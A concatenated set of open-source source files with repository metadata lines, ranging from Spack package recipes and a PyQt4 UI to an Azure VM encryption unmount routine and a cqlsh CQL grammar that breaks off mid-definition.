# Created: Sun May 10 00:57:43 2009
# by: PyQt4 UI code generator 4.4.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_ListEditor(object):
def setupUi(self, ListEditor):
ListEditor.setObjectName("ListEditor")
ListEditor.resize(310, 280)
self.horizontalLayout_2 = QtGui.QHBoxLayout(ListEditor)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.tb_up = QtGui.QToolButton(ListEditor)
self.tb_up.setObjectName("tb_up")
self.verticalLayout.addWidget(self.tb_up)
self.tb_down = QtGui.QToolButton(ListEditor)
self.tb_down.setObjectName("tb_down")
self.verticalLayout.addWidget(self.tb_down)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.listWidget = QtGui.QListWidget(ListEditor)
self.listWidget.setObjectName("listWidget")
self.verticalLayout_2.addWidget(self.listWidget)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.label = QtGui.QLabel(ListEditor)
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
self.toolButton = QtGui.QToolButton(ListEditor)
self.toolButton.setObjectName("toolButton")
self.horizontalLayout_3.addWidget(self.toolButton)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.le_value = QtGui.QLineEdit(ListEditor)
self.le_value.setObjectName("le_value")
self.horizontalLayout.addWidget(self.le_value)
self.tb_change = QtGui.QToolButton(ListEditor)
self.tb_change.setObjectName("tb_change")
self.horizontalLayout.addWidget(self.tb_change)
self.tb_add = QtGui.QToolButton(ListEditor)
self.tb_add.setObjectName("tb_add")
self.horizontalLayout.addWidget(self.tb_add)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.horizontalLayout_2.addLayout(self.verticalLayout_2)
self.retranslateUi(ListEditor)
QtCore.QMetaObject.connectSlotsByName(ListEditor)
def retranslateUi(self, ListEditor):
ListEditor.setWindowTitle(QtGui.QApplication.translate("ListEditor", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.tb_up.setText(QtGui.QApplication.translate("ListEditor", "^", None, QtGui.QApplication.UnicodeUTF8))
self.tb_down.setText(QtGui.QApplication.translate("ListEditor", "v", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("ListEditor", "Selected:", None, QtGui.QApplication.UnicodeUTF8))
self.toolButton.setText(QtGui.QApplication.translate("ListEditor", "-", None, QtGui.QApplication.UnicodeUTF8))
self.tb_change.setText(QtGui.QApplication.translate("ListEditor", "=", None, QtGui.QApplication.UnicodeUTF8))
self.tb_add.setText(QtGui.QApplication.translate("ListEditor", "+", None, QtGui.QApplication.UnicodeUTF8))
| apdjustino/DRCOG_Urbansim | src/opus_gui/main/views/ui_list_editor.py | Python | agpl-3.0 | 3,680 |
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S+00:00'
| liveblog/liveblog | server/liveblog/tests/test_settings.py | Python | agpl-3.0 | 40 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RPhilentropy(RPackage):
"""Computes 46 optimized distance and similarity measures for comparing
probability functions (Drost (2018) <doi:10.21105/joss.00765>). These
comparisons between probability functions have their foundations in a broad
range of scientific disciplines from mathematics to ecology. The aim of
this package is to provide a core framework for clustering, classification,
statistical inference, goodness-of-fit, non-parametric statistics,
information theory, and machine learning tasks that are based on comparing
univariate or multivariate probability functions."""
homepage = "https://github.com/HajkD/philentropy"
url = "https://cloud.r-project.org/src/contrib/philentropy_0.4.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/philentropy"
version('0.4.0', sha256='bfd30bf5635aab6a82716299a87d44cf96c7ab7f4ee069843869bcc85c357127')
depends_on('r@3.1.2:', type=('build', 'run'))
depends_on('r-rcpp', type=('build', 'run'))
depends_on('r-dplyr', type=('build', 'run'))
depends_on('r-kernsmooth', type=('build', 'run'))
| iulian787/spack | var/spack/repos/builtin/packages/r-philentropy/package.py | Python | lgpl-2.1 | 1,356 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Wgsim(Package):
"""Wgsim is a small tool for simulating sequence reads from a reference
genome.
It is able to simulate diploid genomes with SNPs and insertion/deletion
(INDEL) polymorphisms, and simulate reads with uniform substitution
sequencing errors. It does not generate INDEL sequencing errors, but this
can be partly compensated by simulating INDEL polymorphisms."""
homepage = "https://github.com/lh3/wgsim"
git = "https://github.com/lh3/wgsim.git"
version('2011.10.17', commit='a12da3375ff3b51a5594d4b6fa35591173ecc229')
depends_on('zlib')
def install(self, spec, prefix):
cc = Executable(spack_cc)
cc('-g', '-O2', '-Wall', '-o', 'wgsim', 'wgsim.c', '-lz', '-lm')
install_tree(self.stage.source_path, prefix.bin)
| iulian787/spack | var/spack/repos/builtin/packages/wgsim/package.py | Python | lgpl-2.1 | 1,027 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyUnicycler(PythonPackage):
"""Unicycler is an assembly pipeline for bacterial genomes. It can
assemble Illumina-only read sets where it functions as a SPAdes-optimiser.
It can also assembly long-read-only sets (PacBio or Nanopore) where it
runs a miniasm+Racon pipeline. For the best possible assemblies, give it
both Illumina reads and long reads, and it will conduct a hybrid assembly.
"""
homepage = "https://github.com/rrwick/Unicycler"
url = "https://github.com/rrwick/Unicycler/archive/v0.4.5.tar.gz"
version('0.4.7', sha256='a8cf65e46dc2694b0fbd4e9190c73a1f300921457aadfab27a1792b785620d63')
version('0.4.6', sha256='56f6f358a5d1f8dd0fcd1df04504079fc42cec8453a36ee59ff89295535d03f5')
version('0.4.5', sha256='67043656b31a4809f8fa8f73368580ba7658c8440b9f6d042c7f70b5eb6b19ae')
depends_on('python@3.4:', type=('build', 'link', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('spades', type='run')
depends_on('pilon', type='run')
depends_on('jdk', type=('build', 'run'))
depends_on('bowtie2', type='run')
depends_on('samtools@1.0:', type=('build', 'link', 'run'))
depends_on('racon', type=('build', 'link', 'run'))
depends_on('blast-plus', type='run')
conflicts('%gcc@:4.9.0')
conflicts('%clang@:3.4.2')
| iulian787/spack | var/spack/repos/builtin/packages/py-unicycler/package.py | Python | lgpl-2.1 | 1,554 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""Schema for mirrors.yaml configuration file.
.. literalinclude:: ../spack/schema/mirrors.py
:lines: 32-
"""
schema = {
'$schema': 'http://json-schema.org/schema#',
'title': 'Spack mirror configuration file schema',
'type': 'object',
'additionalProperties': False,
'patternProperties': {
r'mirrors': {
'type': 'object',
'default': {},
'additionalProperties': False,
'patternProperties': {
r'\w[\w-]*': {
'type': 'string'},
},
},
},
}
| TheTimmy/spack | lib/spack/spack/schema/mirrors.py | Python | lgpl-2.1 | 1,811 |
{
'name': "Sync POS orders across multiple sessions",
'version': '1.0.0',
'author': 'Ivan Yelizariev',
'category': 'Point Of Sale',
'website': 'https://yelizariev.github.io',
'depends': ['pos_disable_payment', 'bus'],
'data': [
'security/ir.model.access.csv',
'views.xml',
],
'qweb': [
'static/src/xml/pos_multi_session.xml',
],
'installable': True,
}
| odoocn/pos-addons | pos_multi_session/__openerp__.py | Python | lgpl-3.0 | 424 |
#!/usr/bin/env python
import os, sys
import unittest
from gppylib import gplog
from gpsegstart import GpSegStart
from mock import patch
logger = gplog.get_unittest_logger()
class GpSegStartTestCase(unittest.TestCase):
@patch('gpsegstart.GpSegStart.getOverallStatusKeys', return_value=[])
@patch('gpsegstart.gp.GpVersion.local', return_value=None)
@patch('gpsegstart.base.WorkerPool')
def test_check_postmasters_01(self, mk1, mk2, mk3):
db = '1|1|p|p|s|u|mdw|mdw-1|2000|/data/gpseg-1s'
gpseg = GpSegStart([db], None, 'col1:col2:col3', 'quiescent', None, None, None, None, None, None, None)
result = gpseg.checkPostmasters(False)
self.assertTrue(result)
@patch('gpsegstart.GpSegStart.getOverallStatusKeys', return_value=['foo1', 'foo2'])
@patch('gpsegstart.gp.check_pid', return_value=False)
@patch('gpsegstart.gp.GpVersion.local', return_value=None)
@patch('gpsegstart.base.WorkerPool')
def test_check_postmasters_02(self, mk1, mk2, mk3, mk4):
db = '1|1|p|p|s|u|mdw|mdw-1|2000|/data/gpseg-1s'
gpseg = GpSegStart([db], None, 'col1:col2:col3', 'quiescent', None, None, None, None, None, None, None)
result = gpseg.checkPostmasters(False)
self.assertFalse(result)
@patch('gpsegstart.GpSegStart.getOverallStatusKeys', return_value=['foo1', 'foo2'])
@patch('gpsegstart.gp.check_pid', side_effect=[False, True])
@patch('gpsegstart.gp.GpVersion.local', return_value=None)
@patch('gpsegstart.base.WorkerPool')
def test_check_postmasters_03(self, mk1, mk2, mk3, mk4):
db = '1|1|p|p|s|u|mdw|mdw-1|2000|/data/gpseg-1s'
gpseg = GpSegStart([db], None, 'col1:col2:col3', 'quiescent', None, None, None, None, None, None, None)
result = gpseg.checkPostmasters(False)
self.assertFalse(result)
#------------------------------- Mainline --------------------------------
if __name__ == '__main__':
unittest.main()
| Chibin/gpdb | gpMgmt/bin/gppylib/test/unit/test_cluster_gpsegstart.py | Python | apache-2.0 | 1,956 |
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for setting scheduling for virtual machine instances."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.command_lib.compute import flags
from googlecloudsdk.command_lib.compute.instances import flags as instance_flags
class SetSchedulingInstances(base_classes.NoOutputAsyncMutator):
"""Set scheduling options for Google Compute Engine virtual machine instances.
"""
@staticmethod
def Args(parser):
restart_on_failure = parser.add_argument(
'--restart-on-failure',
action='store_true',
default=None, # Tri-valued: None => don't change the setting.
help='Restart instances if they are terminated by Compute Engine.')
restart_on_failure.detailed_help = """\
The instances will be restarted if they are terminated by Compute '
Engine. This does not affect terminations performed by the user.'
"""
instance_flags.AddMaintenancePolicyArgs(parser)
instance_flags.INSTANCE_ARG.AddArgument(parser)
@property
def service(self):
return self.compute.instances
@property
def method(self):
return 'SetScheduling'
@property
def resource_type(self):
return 'instances'
def CreateRequests(self, args):
"""Returns a list of request necessary for setting scheduling options."""
instance_ref = instance_flags.INSTANCE_ARG.ResolveAsResource(
args, self.resources, scope_lister=flags.GetDefaultScopeLister(
self.compute_client, self.project))
scheduling_options = self.messages.Scheduling()
scheduling_options.automaticRestart = args.restart_on_failure
if args.maintenance_policy:
scheduling_options.onHostMaintenance = (
self.messages.Scheduling.OnHostMaintenanceValueValuesEnum(
args.maintenance_policy))
request = self.messages.ComputeInstancesSetSchedulingRequest(
instance=instance_ref.Name(),
project=self.project,
scheduling=scheduling_options,
zone=instance_ref.zone)
return [request]
SetSchedulingInstances.detailed_help = {
'brief': ('Set scheduling options for Google Compute Engine virtual '
'machines'),
'DESCRIPTION': """\
*${command}* is used to configure scheduling options for Google Compute
Engine virtual machines.
""",
}
| KaranToor/MA450 | google-cloud-sdk/lib/surface/compute/instances/set_scheduling.py | Python | apache-2.0 | 2,935 |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
class HTTPError(Exception):
'''
Represents an HTTP Exception when response status code >= 300.
:ivar int status:
the status code of the response
:ivar str message:
the message
:ivar list headers:
the returned headers, as a list of (name, value) pairs
:ivar bytes body:
the body of the response
'''
def __init__(self, status, message, respheader, respbody):
self.status = status
self.respheader = respheader
self.respbody = respbody
Exception.__init__(self, message)
class HTTPResponse(object):
'''
Represents a response from an HTTP request.
:ivar int status:
the status code of the response
:ivar str message:
the message
:ivar dict headers:
the returned headers
:ivar bytes body:
the body of the response
'''
def __init__(self, status, message, headers, body):
self.status = status
self.message = message
self.headers = headers
self.body = body
class HTTPRequest(object):
'''
Represents an HTTP Request.
:ivar str host:
the host name to connect to
:ivar str method:
the method to use to connect (string such as GET, POST, PUT, etc.)
:ivar str path:
the uri fragment
:ivar dict query:
query parameters
:ivar dict headers:
header values
:ivar bytes body:
the body of the request.
'''
def __init__(self):
self.host = ''
self.method = ''
self.path = ''
self.query = {} # list of (name, value)
self.headers = {} # list of (header name, header value)
self.body = ''
| rajrohith/blobstore | azure/storage/_http/__init__.py | Python | apache-2.0 | 2,461 |
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.7+
#
import os
import re
import sys
from time import sleep
from OSEncryptionState import *
class UnmountOldrootState(OSEncryptionState):
def __init__(self, context):
super(UnmountOldrootState, self).__init__('UnmountOldrootState', context)
def should_enter(self):
self.context.logger.log("Verifying if machine should enter unmount_oldroot state")
if not super(UnmountOldrootState, self).should_enter():
return False
self.context.logger.log("Performing enter checks for unmount_oldroot state")
self.command_executor.ExecuteInBash('[ -e "/oldroot" ]', True)
if self.command_executor.Execute('mountpoint /oldroot') != 0:
return False
return True
def enter(self):
if not self.should_enter():
return
self.context.logger.log("Entering unmount_oldroot state")
self.command_executor.Execute('systemctl rescue', True)
self.command_executor.Execute('systemctl start sshd.service', True)
self.command_executor.Execute('systemctl start walinuxagent.service', True)
proc_comm = ProcessCommunicator()
self.command_executor.Execute(command_to_execute="systemctl list-units",
raise_exception_on_failure=True,
communicator=proc_comm)
for line in proc_comm.stdout.split('\n'):
if not "running" in line:
continue
if "walinuxagent.service" in line or "sshd.service" in line:
continue
match = re.search(r'\s(\S*?\.service)', line)
if match:
service = match.groups()[0]
self.command_executor.Execute('systemctl restart {0}'.format(service))
self.command_executor.Execute('swapoff -a', True)
self.bek_util.umount_azure_passhprase(self.encryption_config, force=True)
if os.path.exists("/oldroot/mnt"):
self.command_executor.Execute('umount /oldroot/mnt')
if os.path.exists("/oldroot/mnt/azure_bek_disk"):
self.command_executor.Execute('umount /oldroot/mnt/azure_bek_disk')
if os.path.exists("/mnt"):
self.command_executor.Execute('umount /mnt')
if os.path.exists("/mnt/azure_bek_disk"):
self.command_executor.Execute('umount /mnt/azure_bek_disk')
proc_comm = ProcessCommunicator()
self.command_executor.Execute(command_to_execute="fuser -vm /oldroot",
raise_exception_on_failure=True,
communicator=proc_comm)
self.context.logger.log("Processes using oldroot:\n{0}".format(proc_comm.stdout))
procs_to_kill = filter(lambda p: p.isdigit(), proc_comm.stdout.split())
procs_to_kill = reversed(sorted(procs_to_kill))
for victim in procs_to_kill:
proc_name = ""
try:
with open("/proc/{0}/cmdline".format(victim)) as f:
proc_name = f.read()
except IOError as e:
self.context.logger.log("Proc {0} is already dead".format(victim))
self.context.logger.log("Killing process: {0} ({1})".format(proc_name, victim))
if int(victim) == os.getpid():
self.context.logger.log("Restarting WALA in 30 seconds before committing suicide")
# Kill any other daemons that are blocked and would be executed after this process commits
# suicide
self.command_executor.ExecuteInBash('sleep 30 && pkill -f .*ForLinux.*handle.py.*daemon.* && systemctl start walinuxagent &', True)
if int(victim) == 1:
self.context.logger.log("Skipping init")
continue
if "mount.ntfs" in proc_name:
self.context.logger.log("Skipping mount.ntfs")
continue
self.command_executor.Execute('kill -9 {0}'.format(victim))
self.command_executor.Execute('telinit u', True)
sleep(3)
self.command_executor.Execute('umount /oldroot', True)
sleep(3)
attempt = 1
while True:
if attempt > 10:
raise Exception("Block device {0} did not appear in 10 restart attempts".format(self.rootfs_block_device))
self.context.logger.log("Restarting systemd-udevd")
self.command_executor.Execute('systemctl restart systemd-udevd')
self.context.logger.log("Restarting systemd-timesyncd")
self.command_executor.Execute('systemctl restart systemd-timesyncd')
sleep(10)
if self.command_executor.ExecuteInBash('[ -b {0} ]'.format(self.rootfs_block_device), False) == 0:
break
attempt += 1
self.command_executor.Execute('e2fsck -yf {0}'.format(self.rootfs_block_device), True)
def should_exit(self):
self.context.logger.log("Verifying if machine should exit unmount_oldroot state")
if os.path.exists('/oldroot/bin'):
self.context.logger.log("/oldroot was not unmounted")
return False
return super(UnmountOldrootState, self).should_exit()
| varunkumta/azure-linux-extensions | VMEncryption/main/oscrypto/ubuntu_1604/encryptstates/UnmountOldrootState.py | Python | apache-2.0 | 5,976 |
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
from common import runtests
from .shared import try_except_maker3
from .shared import setGenerator, test_exceptions
setGenerator(try_except_maker3)
runtests(test_exceptions)
| tempbottle/ironpython3 | Tests/compat/sbs_exceptions/try_except3.py | Python | apache-2.0 | 904 |
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Global import for model hyper-parameters.
Using this module any ModelParams can be accessed via GetParams.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import REDACTED.tensorflow_models.mlperf.models.rough.transformer_lingvo.lingvo.compat as tf
def _Import(name):
"""Imports the python module of the given name."""
tf.logging.info('Importing %s', name)
try:
importlib.import_module(name)
tf.logging.info('Imported %s', name)
except ImportError as e:
# It is expected that some imports may be missing.
tf.logging.info('Could not import %s: %s', name, e)
_TASK_ROOT = 'REDACTED.tensorflow_models.mlperf.models.rough.transformer_lingvo.lingvo.tasks'
# LINT.IfChange(task_dirs)
_TASK_DIRS = (
'asr',
'car',
'image',
'lm',
'mt',
'punctuator',
)
# LINT.ThenChange(tasks/BUILD:task_dirs)
def ImportAllParams(task_root=_TASK_ROOT, task_dirs=_TASK_DIRS):
# Import all ModelParams to ensure that they are added to the global registry.
for task in task_dirs:
# By our code repository convention, there is a params.py under the task's
# params directory. params.py imports _all_ modules that may registers a
# model param.
_Import('{}.{}.params.params'.format(task_root, task))
def ImportParams(model_name, task_root=_TASK_ROOT, task_dirs=_TASK_DIRS):
"""Attempts to only import the files that may contain the model."""
# 'model_name' follows <task>.<path>.<class name>
if '.' not in model_name:
raise ValueError('Invalid model name %s' % model_name)
model_module = model_name.rpartition('.')[0]
# Try importing the module directly, in case it's a local import.
_Import(model_module)
# Try built-in tasks imports.
for task in sorted(task_dirs):
if model_module.startswith(task + '.'):
path = model_module[len(task) + 1:]
_Import('{}.{}.params.{}'.format(task_root, task, path))
| mlperf/training_results_v0.7 | Google/benchmarks/transformer/implementations/transformer-research-TF-tpu-v4-16/lingvo/model_imports.py | Python | apache-2.0 | 2,689 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .cqlhandling import CqlParsingRuleSet, Hint
from cassandra.metadata import maybe_escape_name
simple_cql_types = set(('ascii', 'bigint', 'blob', 'boolean', 'counter', 'date', 'decimal', 'double', 'duration', 'float',
'inet', 'int', 'smallint', 'text', 'time', 'timestamp', 'timeuuid', 'tinyint', 'uuid', 'varchar', 'varint'))
simple_cql_types.difference_update(('set', 'map', 'list'))
from . import helptopics
cqldocs = helptopics.CQL3HelpTopics()
class UnexpectedTableStructure(UserWarning):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return 'Unexpected table structure; may not translate correctly to CQL. ' + self.msg
SYSTEM_KEYSPACES = ('system', 'system_schema', 'system_traces', 'system_auth', 'system_distributed')
NONALTERBALE_KEYSPACES = ('system', 'system_schema')
class Cql3ParsingRuleSet(CqlParsingRuleSet):
columnfamily_layout_options = (
('bloom_filter_fp_chance', None),
('comment', None),
('dclocal_read_repair_chance', 'local_read_repair_chance'),
('gc_grace_seconds', None),
('min_index_interval', None),
('max_index_interval', None),
('read_repair_chance', None),
('default_time_to_live', None),
('speculative_retry', None),
('memtable_flush_period_in_ms', None),
('cdc', None)
)
columnfamily_layout_map_options = (
# (CQL3 option name, schema_columnfamilies column name (or None if same),
# list of known map keys)
('compaction', 'compaction_strategy_options',
('class', 'max_threshold', 'tombstone_compaction_interval', 'tombstone_threshold', 'enabled', 'unchecked_tombstone_compaction', 'only_purge_repaired_tombstones')),
('compression', 'compression_parameters',
('sstable_compression', 'chunk_length_kb', 'crc_check_chance')),
('caching', None,
('rows_per_partition', 'keys')),
)
obsolete_cf_options = ()
consistency_levels = (
'ANY',
'ONE',
'TWO',
'THREE',
'QUORUM',
'ALL',
'LOCAL_QUORUM',
'EACH_QUORUM',
'SERIAL'
)
size_tiered_compaction_strategy_options = (
'min_sstable_size',
'min_threshold',
'bucket_high',
'bucket_low'
)
leveled_compaction_strategy_options = (
'sstable_size_in_mb',
'fanout_size'
)
date_tiered_compaction_strategy_options = (
'base_time_seconds',
'max_sstable_age_days',
'min_threshold',
'max_window_size_seconds',
'timestamp_resolution'
)
time_window_compaction_strategy_options = (
'compaction_window_unit',
'compaction_window_size',
'min_threshold',
'timestamp_resolution'
)
@classmethod
def escape_value(cls, value):
if value is None:
return 'NULL' # this totally won't work
if isinstance(value, bool):
value = str(value).lower()
elif isinstance(value, float):
return '%f' % value
elif isinstance(value, int):
return str(value)
return "'%s'" % value.replace("'", "''")
@classmethod
def escape_name(cls, name):
if name is None:
return 'NULL'
return "'%s'" % name.replace("'", "''")
@staticmethod
def dequote_name(name):
name = name.strip()
if name == '':
return name
if name[0] == '"' and name[-1] == '"':
return name[1:-1].replace('""', '"')
else:
return name.lower()
@staticmethod
def dequote_value(cqlword):
cqlword = cqlword.strip()
if cqlword == '':
return cqlword
if cqlword[0] == "'" and cqlword[-1] == "'":
cqlword = cqlword[1:-1].replace("''", "'")
return cqlword
CqlRuleSet = Cql3ParsingRuleSet()
# convenience for remainder of module
completer_for = CqlRuleSet.completer_for
explain_completion = CqlRuleSet.explain_completion
dequote_value = CqlRuleSet.dequote_value
dequote_name = CqlRuleSet.dequote_name
escape_value = CqlRuleSet.escape_value
# BEGIN SYNTAX/COMPLETION RULE DEFINITIONS
syntax_rules = r'''
<Start> ::= <CQL_Statement>*
;
<CQL_Statement> ::= [statements]=<statementBody> ";"
;
# the order of these terminal productions is significant:
<endline> ::= /\n/ ;
JUNK ::= /([ \t\r\f\v]+|(--|[/][/])[^\n\r]*([\n\r]|$)|[/][*].*?[*][/])/ ;
<stringLiteral> ::= <quotedStringLiteral>
| <pgStringLiteral> ;
<quotedStringLiteral> ::= /'([^']|'')*'/ ;
<pgStringLiteral> ::= /\$\$(?:(?!\$\$).)*\$\$/;
<quotedName> ::= /"([^"]|"")*"/ ;
<float> ::= /-?[0-9]+\.[0-9]+/ ;
<uuid> ::= /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/ ;
<blobLiteral> ::= /0x[0-9a-f]+/ ;
<wholenumber> ::= /[0-9]+/ ;
<identifier> ::= /[a-z][a-z0-9_]*/ ;
<colon> ::= ":" ;
<star> ::= "*" ;
<endtoken> ::= ";" ;
<op> ::= /[-+=%/,().]/ ;
<cmp> ::= /[<>!]=?/ ;
<brackets> ::= /[][{}]/ ;
<integer> ::= "-"? <wholenumber> ;
<boolean> ::= "true"
| "false"
;
<unclosedPgString>::= /\$\$(?:(?!\$\$).)*/ ;
<unclosedString> ::= /'([^']|'')*/ ;
<unclosedName> ::= /"([^"]|"")*/ ;
<unclosedComment> ::= /[/][*].*$/ ;
<term> ::= <stringLiteral>
| <integer>
| <float>
| <uuid>
| <boolean>
| <blobLiteral>
| <collectionLiteral>
| <functionLiteral> <functionArguments>
| "NULL"
;
<functionLiteral> ::= (<identifier> ( "." <identifier> )?)
| "TOKEN"
;
<functionArguments> ::= "(" ( <term> ( "," <term> )* )? ")"
;
<tokenDefinition> ::= token="TOKEN" "(" <term> ( "," <term> )* ")"
| <term>
;
<cident> ::= <quotedName>
| <identifier>
| <unreservedKeyword>
;
<colname> ::= <cident> ; # just an alias
<collectionLiteral> ::= <listLiteral>
| <setLiteral>
| <mapLiteral>
;
<listLiteral> ::= "[" ( <term> ( "," <term> )* )? "]"
;
<setLiteral> ::= "{" ( <term> ( "," <term> )* )? "}"
;
<mapLiteral> ::= "{" <term> ":" <term> ( "," <term> ":" <term> )* "}"
;
<anyFunctionName> ::= ( ksname=<cfOrKsName> dot="." )? udfname=<cfOrKsName> ;
<userFunctionName> ::= ( ksname=<nonSystemKeyspaceName> dot="." )? udfname=<cfOrKsName> ;
<refUserFunctionName> ::= udfname=<cfOrKsName> ;
<userAggregateName> ::= ( ksname=<nonSystemKeyspaceName> dot="." )? udaname=<cfOrKsName> ;
<functionAggregateName> ::= ( ksname=<nonSystemKeyspaceName> dot="." )? functionname=<cfOrKsName> ;
<aggregateName> ::= <userAggregateName>
;
<functionName> ::= <functionAggregateName>
| "TOKEN"
;
<statementBody> ::= <useStatement>
| <selectStatement>
| <dataChangeStatement>
| <schemaChangeStatement>
| <authenticationStatement>
| <authorizationStatement>
;
<dataChangeStatement> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
| <truncateStatement>
| <batchStatement>
;
<schemaChangeStatement> ::= <createKeyspaceStatement>
| <createColumnFamilyStatement>
| <createIndexStatement>
| <createMaterializedViewStatement>
| <createUserTypeStatement>
| <createFunctionStatement>
| <createAggregateStatement>
| <createTriggerStatement>
| <dropKeyspaceStatement>
| <dropColumnFamilyStatement>
| <dropIndexStatement>
| <dropMaterializedViewStatement>
| <dropUserTypeStatement>
| <dropFunctionStatement>
| <dropAggregateStatement>
| <dropTriggerStatement>
| <alterTableStatement>
| <alterKeyspaceStatement>
| <alterUserTypeStatement>
;
<authenticationStatement> ::= <createUserStatement>
| <alterUserStatement>
| <dropUserStatement>
| <listUsersStatement>
| <createRoleStatement>
| <alterRoleStatement>
| <dropRoleStatement>
| <listRolesStatement>
;
<authorizationStatement> ::= <grantStatement>
| <grantRoleStatement>
| <revokeStatement>
| <revokeRoleStatement>
| <listPermissionsStatement>
;
# timestamp is included here, since it's also a keyword
<simpleStorageType> ::= typename=( <identifier> | <stringLiteral> | "timestamp" ) ;
<userType> ::= utname=<cfOrKsName> ;
<storageType> ::= <simpleStorageType> | <collectionType> | <frozenCollectionType> | <userType> ;
# Note: autocomplete for frozen collection types does not handle nesting past depth 1 properly,
# but that's a lot of work to fix for little benefit.
<collectionType> ::= "map" "<" <simpleStorageType> "," ( <simpleStorageType> | <userType> ) ">"
